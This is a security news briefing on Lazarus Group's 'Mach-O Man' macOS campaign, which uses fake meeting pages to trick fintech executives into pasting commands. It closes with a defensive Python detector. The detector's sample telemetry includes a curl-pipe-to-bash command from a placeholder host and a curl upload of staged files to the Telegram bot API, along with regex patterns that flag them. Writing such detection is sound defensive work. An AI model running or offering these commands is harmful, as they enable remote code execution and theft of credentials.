Lazarus targets fintech execs

- North Korea-linked Lazarus Group launched the 'Mach-O Man' campaign, targeting fintech and crypto executives with macOS malware.
- The attacks are being delivered through business communications aimed at high-value industry insiders.
- This activity underscores macOS as an active attack vector for financial-sector compromises and targeted espionage. (x.com)

North Korea-linked Lazarus operators are using a new macOS malware campaign to target fintech and crypto executives through fake business meetings. (coindesk.com) Researchers and security firms identified the campaign this week as “Mach-O Man,” a toolkit built around native Mac binaries and delivered through ClickFix-style prompts that trick victims into running commands themselves. (any.run)

The lures arrive over Telegram and impersonate routine work messages, often from compromised accounts, before sending targets to fake Zoom, Microsoft Teams or Google Meet pages. Those pages claim there is an audio or camera problem and instruct the victim to paste a terminal command into macOS. (any.run; bleepingcomputer.com)

The malware is aimed at credentials, browser sessions and macOS Keychain data, which can hand attackers access to internal systems and financial accounts. ANY.RUN said the stolen data is exfiltrated through Telegram, a channel many companies already allow. (any.run)

Mac malware matters here because many crypto and fintech firms rely on Apple laptops for executives, developers and deal teams. Google’s Mandiant said a separate North Korea-linked intrusion at a fintech company in February 2026 used seven distinct macOS malware families after a similar fake-meeting setup. (bleepingcomputer.com)

The tradecraft is also part of a broader shift in Lazarus social engineering. Sekoia found that by February 2025 the group had expanded its “Contagious Interview” operations from developers to nontechnical staff in centralized finance, including business developers and marketing managers. (bleepingcomputer.com)

North Korean operators have been pushing Mac-focused crypto intrusions for at least the past two years. SentinelOne’s November 2024 “Hidden Risk” report tied BlueNoroff, a Lazarus subgroup, to phishing emails and fake PDF apps aimed at Web3, crypto, fintech and investment firms. (therecord.media)

U.S. officials have tied Lazarus to some of the industry’s biggest thefts. The Federal Bureau of Investigation said on February 26, 2025 that North Korea was responsible for the theft of about $1.5 billion in virtual assets from Bybit. (ic3.gov) That makes a fake meeting link more than a phishing nuisance for the companies being targeted now. In this campaign, one pasted command on a Mac can become a path into wallets, cloud systems and executive accounts. (any.run; ic3.gov)
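The two observable steps of the chain described above, a download piped into a shell from a terminal and a later upload to Telegram's API from something other than the Telegram client, are what an endpoint detection would key on. The following is an added example written for this briefing, not code from ANY.RUN, Mandiant or any vendor; the JSON-lines telemetry format, field names, hostnames and sample events are all constructed assumptions.

```python
# Added example (not from ANY.RUN, Mandiant or the original article): scan constructed
# macOS process telemetry for the ClickFix chain the article describes. The JSON-lines
# format and field names are assumptions, not any vendor's schema.
import json
import re

# Constructed sample events; hostnames, paths and the bot token are placeholders.
SAMPLE_EVENTS = r"""
{"ts":"10:01:05","user":"alice","parent":"Terminal","proc":"zsh","cmd":"zsh -c 'curl -fsSL https://meet-fix.invalid/fix.sh | bash'","dest":"meet-fix.invalid"}
{"ts":"10:01:12","user":"alice","parent":"bash","proc":"curl","cmd":"curl -s -F document=@/tmp/staged.zip https://api.telegram.org/bot<TOKEN>/sendDocument","dest":"api.telegram.org"}
{"ts":"10:15:00","user":"bob","parent":"launchd","proc":"Telegram","cmd":"/Applications/Telegram.app/Contents/MacOS/Telegram","dest":"api.telegram.org"}
{"ts":"10:20:00","user":"carol","parent":"Terminal","proc":"zsh","cmd":"zsh -c 'git pull'","dest":""}
"""

# A download piped straight into a shell, typed into a terminal, is the ClickFix signature.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b")
TERMINALS = {"Terminal", "iTerm2"}
# The Telegram client is expected to talk to the API host; curl or python from a shell is not.
TELEGRAM_API_HOST = "api.telegram.org"
EXPECTED_TELEGRAM_CLIENTS = {"Telegram"}


def classify(event):
    """Return a finding name for one event, or None if it looks benign."""
    if event["parent"] in TERMINALS and PIPE_TO_SHELL.search(event["cmd"]):
        return "clickfix_pipe_to_shell"
    if event["dest"] == TELEGRAM_API_HOST and event["proc"] not in EXPECTED_TELEGRAM_CLIENTS:
        return "telegram_api_from_unexpected_process"
    return None


def detect(events_text):
    """Parse JSON-lines telemetry and return (finding, user, ts) for each suspicious event."""
    findings = []
    for line in events_text.strip().splitlines():
        event = json.loads(line)
        finding = classify(event)
        if finding:
            findings.append((finding, event["user"], event["ts"]))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Both findings land on the same user within seconds, which is the correlation worth alerting on; the legitimate Telegram client and an ordinary `git pull` in Terminal produce nothing.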
